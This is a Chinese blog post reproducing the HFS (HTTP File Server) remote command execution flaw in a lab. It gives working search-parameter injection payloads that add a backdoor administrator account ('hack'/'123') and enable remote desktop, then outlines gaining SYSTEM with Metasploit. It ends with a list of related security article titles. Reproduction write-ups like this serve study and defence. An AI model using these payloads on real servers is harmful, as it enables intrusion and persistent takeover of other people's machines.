漏洞程序下载地址:Http File Server

这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。

运行程序截图如下

尝试访问该软件提供的web服务

web服务是这个样子的,这个web服务的搜索处存在漏洞

一、手工利用

payload如下

http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}
http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}
  • 1
  • 2

完整利用过程如下
使用如下payload添加一个管理员账户

http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.}
  • 1

添加用户:hack
密码:123

将用户hack添加到Administrators组。

http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators hack /add.}
  • 1


开启3389远程端口

使用远程连接工具连接,连接成功。

2、使用msf利用

启动Metasploit,搜索hfs漏洞利用模块

加载模块,并设置目标IP

设置payload,以及本机IP

开始执行

成功获得system权限


http://www.taodudu.cc/news/show-969961.html

相关文章:

  • 渗透测试神器CS(4.0)的使用
  • git信息泄露漏洞
  • 目录爆破工具 -- dirsearch
  • 哥斯拉Webshell
  • 一次线上ctf的网络协议分析
  • 模拟服务器和客户端交互的python脚本
  • 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
  • 在BurpSuite中安装Jython环境
  • xss测试工具(xsstrike基于python)
  • Windows安全配置加固
  • 解决Pycharm窗口一闪而过的问题
  • 绕过 WAF:绕过一些 WAF 设备的 Burp 插件
  • Python 文件读写
  • fofa自动化爬虫脚本更新+详解
  • JS文件信息收集工具-LinkFinder
  • Python----socket编程
  • Autorize插件的使用方法
  • 一个用于伪造IP地址进行爆破的BurpSuite插件:BurpFakeIP
  • BurpSuite插件 -- FastjsonScan(反序列化检测)
  • 【工具使用】Xray与Burp联动--流量转发插件Passive Scan Client
  • 验证码识别Burp reCAPTCHA插件使用
  • BurpSuite插件 -- Struts2-RCE
  • Burpsuite爆破含CSRF-Token的程序
  • 正则表达式贪婪与非贪婪模式
  • 任意文件读取及删除漏洞
  • 从JS敏感信息泄露到GETSHELL
  • 实战|全程分析js到getshell
  • 多家防火墙设备存在信息泄露漏洞
  • php boolean 全大写还是全小写,【PHP培训】PHP为什么大小写规则是如此不规则?
  • Web安全-伪静态网页

HFS远程命令执行漏洞复现相关推荐

  1. PHPMailer远程命令执行漏洞复现

    ​PHPMailer远程命令执行漏洞复现 一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...

  2. 华为路由器远程命令执行漏洞复现(CVE-2017-17215)

    华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...

  3. 开源堡垒机JumpServer远程命令执行漏洞复现

    声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...

  4. Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析

    Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...

  5. Apache[多后缀文件名解析漏洞+换行解析漏洞+SSI远程命令执行漏洞]复现

    目录 一.多后缀文件解析漏洞 二.Apache换行解析漏洞(CVE-2017-15715) 三.Apache SSI 远程命令执行漏洞

  6. thinkphp5.*远程命令执行漏洞复现

    ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http: ...

  7. O2OA RCE 远程命令执行漏洞复现(CVE-2022-22916)

    1.产品简介 O2OA是一款Java开源企业信息化建设平台 ,包括流程管理.门户管理.信息管理.数据管理和服务管理五大平台,可以极大程度上减化企业信息化建设成本和业务应用开发难度. 2.漏洞概述 O2 ...

  8. Google 0day远程命令执行漏洞复现

    目录 漏洞介绍 影响版本 漏洞复现 解决方案 漏洞介绍 国外安全研究员发布了 Google Chrome 浏览器远程代码执行 0Day 漏洞的 PoC,攻击者可以利用漏洞构造特制的页面,用户访问该页面 ...

  9. Apache Solr Velocity 注入远程命令执行漏洞复现 (CVE-2019-17558)

    漏洞描述 Solr是Apache Lucene项目的开源企业搜索平台. 其主要功能包括全文检索.命中标示.分面搜索.动态聚类.数据库集成,以及富文本的处理. 2019年10月30日,国外安全研究人员放 ...

最新文章

  1. centos 6.8 启动损坏修复实验
  2. 神经网络相关名词解释
  3. CH - 6201 走廊泼水节(最小生成树,水题)
  4. 笔记18 客户端跳转
  5. C# 8.x 先睹为快
  6. 交换机知识--生成树协议
  7. 转: android编译过程(流程图)
  8. cmd 命令行方式执行 matlab 脚本
  9. ASP.NET的页面生存周期 [转]
  10. C#中IPAddress与域名的使用
  11. Linux系统下公式编辑器KLatexFormula
  12. Jenkins下载安装及配置
  13. 如何在linux下批量压缩图片
  14. 第十六周项目3电子词典
  15. CVE-2014-3566 SSLv3 POODLE原理分析
  16. ORACLE EBS常用表查询语句
  17. 移动端开发的兼容适配与性能优化干货分享
  18. 基于Unity3D的相机功能的实现(六)—— 上帝视角(王者荣耀视角)
  19. nginx重启报错:nginx: [error] open() “/usr/local/nginx/logs/nginx.pid“ failed (2: No such file or directo
  20. linux查看某个文件大小

热门文章

  1. java list 字段去重_如何实现java8 list按照元素的某个字段去重
  2. python在路径里添加变量_想学Python?那就先从头开始吧!
  3. airpods耳机敲击没反应_iOS11.2.6造成AirPods耳机出现奇怪问题 网友:解决方法很简单...
  4. java 异常堆栈日志分析_Java 进阶之路:深入解读 Java 异常堆栈丢失原因
  5. vue 在 html 中自定义 tag
  6. Python随笔-切片
  7. python下载大文件
  8. quartz Cron-Expression的表达式
  9. pdf转换成可编辑的word转换器
  10. DIV+CSS 入门